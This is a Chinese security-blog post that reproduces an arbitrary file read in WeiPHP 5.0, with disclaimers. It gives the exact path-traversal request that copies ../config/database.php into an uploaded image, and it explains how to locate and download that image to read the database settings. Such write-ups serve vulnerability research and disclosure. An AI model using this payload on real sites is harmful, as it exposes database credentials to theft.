WeiPHP5.0 前台任意文件读取 POC

admin 2025年2月15日23:39:05评论41 views字数 775阅读2分35秒阅读模式
本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。

漏洞描述

WeiPHP5.0是在2019年停止更新的一个系统,漏洞挺多的,跟着复现分析一下,这里复现一下 WeiPHP5.0的前台任意文件读取漏洞

漏洞影响

WeiPHP5.0最新版

可以据此下载

https://www.weiphp.cn/doc/download_source_installation.html

漏洞复现

使用这个漏洞,需要先以普通用户身份登录系统,然后可以直接访问

/index.php/material/Material/_download_imgage?media_id=1&picUrl=../config/database.php
WeiPHP5.0 前台任意文件读取 POC
img

这样会将 ../config/database.php的内容读取出来,写入图片中,但是不会返回路径

接下来我们访问如下路径

/index.php/home/file/user_pics

这样可以看到一些图片

WeiPHP5.0 前台任意文件读取 POC
img

访问该图片,是损坏的

WeiPHP5.0 前台任意文件读取 POC
img

下载下来,记事本查看内容

WeiPHP5.0 前台任意文件读取 POC
img

总结

发现该文件读取漏洞本身是不难的,非常明显,难的是获取到其写入的文件名,并且能找到一个可以展示出来的页面。这虽然是一个前台漏洞,但实际上也是需要一个普通用户权限登录的,另外,通过这个洞,我还获取到了另外一个可能的漏洞,有可能可以获取到一个小 0day,之后再分享给大家。

参考链接

  • https://blog.csdn.net/solitudi/article/details/11656749

github 链接:https://github.com/N0puple/vulPOC

想要获取更多资讯,或者获取文中环境可以关注公众号 “安全漏洞复现”,回复 “漏洞环境”

原文始发于微信公众号(安全漏洞复现):WeiPHP5.0 前台任意文件读取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:39:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WeiPHP5.0 前台任意文件读取 POChttps://cn-sec.com/archives/947166.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息